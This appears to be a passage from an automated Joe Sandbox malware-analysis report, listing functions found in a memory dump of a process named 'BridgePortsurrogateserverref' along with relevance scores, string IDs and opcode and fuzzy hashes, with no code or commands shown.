                                                    • Instruction ID: 12295d94c7036a427b12d9484570be474355e58f41240e36de097332443fa2ca
                                                    • Opcode Fuzzy Hash: 2fa0bd676b561fc58c5bdafa6740780138f1ca4ef0403f004865ee430339ea25
                                                    • Instruction Fuzzy Hash: BE314176B0994A8FE748DB58D4929B8F7A1FF55310B10913AD00ED3686DF24BD56CBC0
                                                    Function 00007FFAAC982ACB Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6$r6
                                                    • API String ID: 0-2018302956
                                                    • Opcode ID: 9248527d99ba9c282d36d24e3d907bf85ef9197c47e1edcac92588c296b1e1e3
                                                    • Instruction ID: c603f564fc8ff77106b45ab8f9822768d37a4ede592891335244e3b6e2e31c03
                                                    • Opcode Fuzzy Hash: 9248527d99ba9c282d36d24e3d907bf85ef9197c47e1edcac92588c296b1e1e3
                                                    • Instruction Fuzzy Hash: 8B314E71A19A1ADFEB48EB58C4919B8F3A2FF59310B148179D00ED3682DF24BC56CBC0
                                                    Function 00007FFAAC987BB5 Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6$r6
                                                    • API String ID: 0-2018302956
                                                    • Opcode ID: 5fe438665e8c8730bf520e933c93d1e3072830667d6c6328015bbebee6adc1c3
                                                    • Instruction ID: 61553d8625d6230bd15a990e4a61f60c85baa09303d3a3d3fa921e782e78aef8
                                                    • Opcode Fuzzy Hash: 5fe438665e8c8730bf520e933c93d1e3072830667d6c6328015bbebee6adc1c3
                                                    • Instruction Fuzzy Hash: D421C57591DA4ACFFB98E76848526B8B7D1FF56310F544179E00EC3283DE28A94A43D1
                                                    Function 00007FFAAC9842D5 Relevance: 1.7, Strings: 1, Instructions: 429COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: b4
                                                    • API String ID: 0-3371602342
                                                    • Opcode ID: 137da8363815e4b20032ee6478ada33f976e8c87a9ba052de1810c1fe19bd3b3
                                                    • Instruction ID: 95045163a80a9d06b9af253772b946be09a3b661e56b37558e4c491abe2e8271
                                                    • Opcode Fuzzy Hash: 137da8363815e4b20032ee6478ada33f976e8c87a9ba052de1810c1fe19bd3b3
                                                    • Instruction Fuzzy Hash: 38F1B034919656CFEB58CF28C4E06B577A1FF46300F5481BDD84F8B68ADA38E985CB81
                                                    Function 00007FFAAC98930F Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: b4
                                                    • API String ID: 0-3371602342
                                                    • Opcode ID: 903e848b6273c1c8daed4507463b785329ad20ca8edda98dd5ad44dabfa3d8f6
                                                    • Instruction ID: b9babfcf832126590bd38b42f50da46327f1ba8762f1179a62c47e851c38121d
                                                    • Opcode Fuzzy Hash: 903e848b6273c1c8daed4507463b785329ad20ca8edda98dd5ad44dabfa3d8f6
                                                    • Instruction Fuzzy Hash: 20F1D034919656CFEB59CF18C4D16B53BA1FF4A300B5581BDD84FCB68ACA38E985CB80
                                                    Function 00007FFAAC981DEB Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: /
                                                    • API String ID: 0-1686368129
                                                    • Opcode ID: 7100189411bc9034711dc846c08340266b25ff491af1f629d0aed335c8b31e8b
                                                    • Instruction ID: 3bc7b3d3e3a507cc5741e3e00995950285dce5f5eaf42fe518d05862a56551e2
                                                    • Opcode Fuzzy Hash: 7100189411bc9034711dc846c08340266b25ff491af1f629d0aed335c8b31e8b
                                                    • Instruction Fuzzy Hash: 8171AF35D1A54ACEFB68DB64C8546BCBBA1FF46300F1085BAD00ED7192DF28AA4987D0
                                                    Function 00007FFAAC98BCDB Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: /
                                                    • API String ID: 0-1686368129
                                                    • Opcode ID: d356e51fde0b12f7b6f8629e033c1b3855af464f8a1f511acbd6f2eadce01f54
                                                    • Instruction ID: 522048df98837db8202e434fab6590d1ed31101a3f5838dfea41ec1026905bd0
                                                    • Opcode Fuzzy Hash: d356e51fde0b12f7b6f8629e033c1b3855af464f8a1f511acbd6f2eadce01f54
                                                    • Instruction Fuzzy Hash: 9A71E274D1D64EDEFB95DB64C8556BCBBA0FF46300F1484BAD00ED3192DE28A949C790
                                                    Function 00007FFAAC986E1B Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: /
                                                    • API String ID: 0-1686368129
                                                    • Opcode ID: fb243b1ad33d67d24cda331581e2e865564eedb8f8e173408975d6e12d23b3d6
                                                    • Instruction ID: e5ee0532de1089de30a8dc5a8213e39c55db27c5ae83400b08a85bbc6d845900
                                                    • Opcode Fuzzy Hash: fb243b1ad33d67d24cda331581e2e865564eedb8f8e173408975d6e12d23b3d6
                                                    • Instruction Fuzzy Hash: 0171D23892954ECFFB55DB68C845ABC7BB1EF46300F1081BAD00EDB192DE28E9598790
                                                    Function 00007FFAAC98E580 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: b4
                                                    • API String ID: 0-3371602342
                                                    • Opcode ID: 53dd04108a7e7eefb080e0e27fa9a38300305fbf2f894ed9874ad702dcca61d2
                                                    • Instruction ID: 0722387190890a0788de1276c81637e8a58b10e93f0c1e8cae0df170c2c51489
                                                    • Opcode Fuzzy Hash: 53dd04108a7e7eefb080e0e27fa9a38300305fbf2f894ed9874ad702dcca61d2
                                                    • Instruction Fuzzy Hash: 2931132881D59ECEF769971884746F4B7A1EF92300F1481FAD05EC71CADD28EE898781
                                                    Function 00007FFAAC98CA93 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6
                                                    • API String ID: 0-2984296541
                                                    • Opcode ID: ddd33ca024589b66da22a29f0f8fd14c8ab73a94cf61c21ee4d0e3750777045e
                                                    • Instruction ID: e6b6aacd59b2278c0f6e3667b8d98d34c4ba503e04f16f6e12ca6a3fbd7c487f
                                                    • Opcode Fuzzy Hash: ddd33ca024589b66da22a29f0f8fd14c8ab73a94cf61c21ee4d0e3750777045e
                                                    • Instruction Fuzzy Hash: C221F676E1EA898FF748E76898526B8B7E0EF46350F04417AD04EC72C3D919A90A8780
                                                    Function 00007FFAAC981A62 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6
                                                    • API String ID: 0-2984296541
                                                    • Opcode ID: df3379a56162aa8e34335797f3314d06ab76f8a19cb5092d289922f043f634f0
                                                    • Instruction ID: 224656c6e7c46d8851d77b3a56da198a152028fe0aede53e8938824cdf0aad7d
                                                    • Opcode Fuzzy Hash: df3379a56162aa8e34335797f3314d06ab76f8a19cb5092d289922f043f634f0
                                                    • Instruction Fuzzy Hash: 1821E775E1591D8FEF98DB58C4A5AB9B7B1FB58301F0041AAD00EE3291DB35A9418B80
                                                    Function 00007FFAAC986A92 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6
                                                    • API String ID: 0-2984296541
                                                    • Opcode ID: df689990066e60407af000e20eb9897a62371cfd18a9101ed01b79c289f350dc
                                                    • Instruction ID: 3371dfb502520db74dc64b54e0cdecda5837de19123ce9db3936862b4df3f9e9
                                                    • Opcode Fuzzy Hash: df689990066e60407af000e20eb9897a62371cfd18a9101ed01b79c289f350dc
                                                    • Instruction Fuzzy Hash: 38310738A1991D8FDF98DB58C455AFCB7B1FF69304F0081BE900EE7291CE35AA458B40
                                                    Function 00007FFAAC987B53 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6
                                                    • API String ID: 0-2984296541
                                                    • Opcode ID: eb8f5cd81468396c1a75028f1a7b8546a5f2576ee9b89be8f82bd2004b203f4c
                                                    • Instruction ID: 2101fe8f36352277c0ca1d6e7f583b7307e1529d07add89297770184e7d8e230
                                                    • Opcode Fuzzy Hash: eb8f5cd81468396c1a75028f1a7b8546a5f2576ee9b89be8f82bd2004b203f4c
                                                    • Instruction Fuzzy Hash: 74217135A59A1ADFEB44EB58D4919B8F3A2FF59350B048139E00EC3682CF24FC568BC0
                                                    Function 00007FFAAC98B969 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6
                                                    • API String ID: 0-2984296541
                                                    • Opcode ID: 0267db9140cc54c7a224a9ea056e9ef9d37c9ca1221f2683093e75bf1309ada3
                                                    • Instruction ID: a387000271fba5b503726aed1c6a23c31a3242425ed3d432c840597a8e6af162
                                                    • Opcode Fuzzy Hash: 0267db9140cc54c7a224a9ea056e9ef9d37c9ca1221f2683093e75bf1309ada3
                                                    • Instruction Fuzzy Hash: 61214A74E1990D9FDB8CDB58C896ABDB7B0EF59314F0441BED00ED3291CE35AA448B80
                                                    Function 00007FFAAC982A67 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6
                                                    • API String ID: 0-2984296541
                                                    • Opcode ID: a29823856a34938b06172cea68cb190fdffff2401583cc47a5d2cd479c84dec4
                                                    • Instruction ID: 58c0d704fee4f5746815528104a65f00c0b4e2e263442c2890d4f57cb052b562
                                                    • Opcode Fuzzy Hash: a29823856a34938b06172cea68cb190fdffff2401583cc47a5d2cd479c84dec4
                                                    • Instruction Fuzzy Hash: DAE0C251E0EB838FFB2A47B048E10782BA08F2B34070641B2C14E8B1C3D94C6D485391
                                                    Function 00007FFAAC987A97 Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6
                                                    • API String ID: 0-2984296541
                                                    • Opcode ID: d7a4f9ee432495906992043cbe465741fcd061d933b527d1dee86ba0d16fd4de
                                                    • Instruction ID: 539eb3669c51d9f8e8b77ff684b8797b032665b5c7a81b4ce00ab285dc5b0224
                                                    • Opcode Fuzzy Hash: d7a4f9ee432495906992043cbe465741fcd061d933b527d1dee86ba0d16fd4de
                                                    • Instruction Fuzzy Hash: 73E08C55D0E786CBF72643A408A10382B918F4B340B0941B6E10E8B2C3D94DBE0853A1
                                                    Function 00007FFAAC982000 Relevance: .7, Instructions: 684COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 10f17a29beba6e24e9db3715d011d2247657388d5ea94de4a6dbf7831ce0f835
                                                    • Instruction ID: b226f459cca32e26ee67d96058a7701a59ee41a3c04bd428400fd0c03f891dd4
                                                    • Opcode Fuzzy Hash: 10f17a29beba6e24e9db3715d011d2247657388d5ea94de4a6dbf7831ce0f835
                                                    • Instruction Fuzzy Hash: F9228634A19A19CFEB98DB18C895A7873E2FFA5314F5081B9D00EC7296DE34ED45CB81
                                                    Function 00007FFAAC98A351 Relevance: .4, Instructions: 412COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13c2a00e8ac1225a22a00f2bb8aecebcaf4a023d7738f7c80cdda0cf27d0d471
                                                    • Instruction ID: d4aa4804f0d39597bc580b6d1e503d86e240b0badd2dab93c6deaca5d67ec147
                                                    • Opcode Fuzzy Hash: 13c2a00e8ac1225a22a00f2bb8aecebcaf4a023d7738f7c80cdda0cf27d0d471
                                                    • Instruction Fuzzy Hash: ADD1F13490EB46CFE368DB28D4845B977E0FF46310B10857EC48EC3696DE29F98A8781
                                                    Function 00007FFAAC985320 Relevance: .4, Instructions: 402COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f36fcb98c2dbe6410b07258993392cd1d3d5398099113787f87c510bd02feca2
                                                    • Instruction ID: f1502c9c8954ef3648a27796bb3ee0236ea2f46d8081a0f5b7b79ccd6be98bc0
                                                    • Opcode Fuzzy Hash: f36fcb98c2dbe6410b07258993392cd1d3d5398099113787f87c510bd02feca2
                                                    • Instruction Fuzzy Hash: F3D1BD3490EA46CFFB68DF28D49057577E1FF46300B14857EC48EC3A96DA29F94A8B81
                                                    Function 00007FFAAC98E1EF Relevance: .4, Instructions: 363COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 22099f2bde4f826471d54f6f7a1f712909c62af241b1cbbda33c432785649307
                                                    • Instruction ID: 2471c597394a59596cfcc3140c6b81b85f1f57ca8c8840b7ec789f5451461797
                                                    • Opcode Fuzzy Hash: 22099f2bde4f826471d54f6f7a1f712909c62af241b1cbbda33c432785649307
                                                    • Instruction Fuzzy Hash: A1D1AB78519646CFEB49CF18C0E05B137A1FF46314B5486FDD85F8B68ADA38E986CB80
                                                    Function 00007FFAAC98932F Relevance: .3, Instructions: 337COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 43b859cda87a67a81940eca236d14f920527b4d845e71067bd1f7859f4ba59cd
                                                    • Instruction ID: 4e27b9982d20d0c4abc7aa22fe9785df0d9de29ea24ad8ba4dee140bac6fb177
                                                    • Opcode Fuzzy Hash: 43b859cda87a67a81940eca236d14f920527b4d845e71067bd1f7859f4ba59cd
                                                    • Instruction Fuzzy Hash: 5FC1CC3451A656CBEB0DCF18C4E15B537A1FF4A300B5585BDD84F8B68BCA38E989CB80
                                                    Function 00007FFAAC98E20F Relevance: .3, Instructions: 334COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4032ab5247669172a024ec9726ea3725efef7d3736623ac549d8b4a1a5afd779
                                                    • Instruction ID: 559d0c196380b314874f273539e649f39cdf1f53b4f73833c02575106423be46
                                                    • Opcode Fuzzy Hash: 4032ab5247669172a024ec9726ea3725efef7d3736623ac549d8b4a1a5afd779
                                                    • Instruction Fuzzy Hash: 36C1BD78519646CBEB09CF18C0E05B137A1FF46314B5486FDD89F8B68ADA38F985CB80
                                                    Function 00007FFAAC9842FF Relevance: .3, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8b400733f09342fabae69b1fe52611cf88fc193f60f0275171dc08c4d7b4a43d
                                                    • Instruction ID: 2e9c8f64ca56c88cb6d4b1bc5c469976e7f185ff407463fb7b531d46fb9d505c
                                                    • Opcode Fuzzy Hash: 8b400733f09342fabae69b1fe52611cf88fc193f60f0275171dc08c4d7b4a43d
                                                    • Instruction Fuzzy Hash: 33C1BD3491A656CBEB0DCF28C0E05B537A1FF46305B5485BDD84F8B68BDA38E985CB81
                                                    Function 00007FFAAC98B467 Relevance: .3, Instructions: 325COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 165f243de1022fd7a457bb5b366f1f4b2197d29c18874edbdbf98d8d22d021a2
                                                    • Instruction ID: 774d283fca89d28954ed6c19d785f4f90a3ddeb85f336b6f5bbbef8fd9fac971
                                                    • Opcode Fuzzy Hash: 165f243de1022fd7a457bb5b366f1f4b2197d29c18874edbdbf98d8d22d021a2
                                                    • Instruction Fuzzy Hash: 3F311229D0E643DBF224A778E8616F86B40AF46334F2C8536D04E875D6CE19BA4D47D2
                                                    Function 00007FFAAC99F1CE Relevance: .3, Instructions: 314COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26858e659a6cf59845a59c067331c6bd4e5a6bc3a071913062dfd88a103715d1
                                                    • Instruction ID: a8cb573458aa8ea4bf21e317d6bafcd9d6d79fb2d88217af905fe14801e41bd2
                                                    • Opcode Fuzzy Hash: 26858e659a6cf59845a59c067331c6bd4e5a6bc3a071913062dfd88a103715d1
                                                    • Instruction Fuzzy Hash: 76A16131608948CFDF89EF58C499EA5B7E1FFA9301B1541A9D00EC76A6DE35EC84CB81
                                                    Function 00007FFAAC9865D3 Relevance: .3, Instructions: 287COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c336a5b306df58d8c373104fa82eb38f50dc58390bf913fe3e835849265ccb41
                                                    • Instruction ID: bea3603d5d536152ea2462e8e1a115f94641bcf3ce8a175e5a81714a8ab5d8a3
                                                    • Opcode Fuzzy Hash: c336a5b306df58d8c373104fa82eb38f50dc58390bf913fe3e835849265ccb41
                                                    • Instruction Fuzzy Hash: 00118E5DD1E797CAFA29436414211B85BA09F43B20FA881FAD54E8F0D2DD1CEA4D53D3
                                                    Function 00007FFAAC98CFD6 Relevance: .3, Instructions: 267COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5947a2f6e48ef7191b7b0d50000bbe1a32dcedd07c5b08ebf80d6efd1a080f77
                                                    • Instruction ID: bad3f919ce4ab979087c035b61f5f712b5d2c94aec76ef1bc8d2358a5d6bc1ca
                                                    • Opcode Fuzzy Hash: 5947a2f6e48ef7191b7b0d50000bbe1a32dcedd07c5b08ebf80d6efd1a080f77
                                                    • Instruction Fuzzy Hash: 1E81263690E647CFF3289B289445575B7E0EF87310B14857ED48ECB582DE29FA4A87C1
                                                    Function 00007FFAAC9880F6 Relevance: .3, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 534d8b02a3e05ad31a768f1c9df9bf4e0842b2fa70a81c39572783152abd1180
                                                    • Instruction ID: acb6e0fff6b029cc9bc7aa725b860802ea12def38e4dc8710e7003932d8420f9
                                                    • Opcode Fuzzy Hash: 534d8b02a3e05ad31a768f1c9df9bf4e0842b2fa70a81c39572783152abd1180
                                                    • Instruction Fuzzy Hash: 0981493591DA868FF3689B28984157577E0EF87350B14847ED48FC3583CE28FA0A87A6
                                                    Function 00007FFAAC9830C6 Relevance: .3, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a1653bb519e139cd364e7ab2c65a56e09065fe568240065dc187169169cda5c
                                                    • Instruction ID: a09b5d7420407efbac606555aaf984f1aca8efd6b8c4026cb10de4b90ceaab05
                                                    • Opcode Fuzzy Hash: 3a1653bb519e139cd364e7ab2c65a56e09065fe568240065dc187169169cda5c
                                                    • Instruction Fuzzy Hash: 7081247590DA46CFF3689B2C944517977E8FF86310B14847EE48FC3192DE28FA4A8781
                                                    Function 00007FFAAC981519 Relevance: .2, Instructions: 250COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62b6d6a74cdd68309749ce65baf337d3551168564f86ef05a13c2c28cda3ba2e
                                                    • Instruction ID: 5d5f34d2a07cec577094e74247a6f6da410879f523c9873efa259e1bc25ee195
                                                    • Opcode Fuzzy Hash: 62b6d6a74cdd68309749ce65baf337d3551168564f86ef05a13c2c28cda3ba2e
                                                    • Instruction Fuzzy Hash: 4671233990E849CFF768DB1884565B837D0FF86311B1882B9D09EC75A6DF18EA0E87C1
                                                    Function 00007FFAAC986259 Relevance: .2, Instructions: 248COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
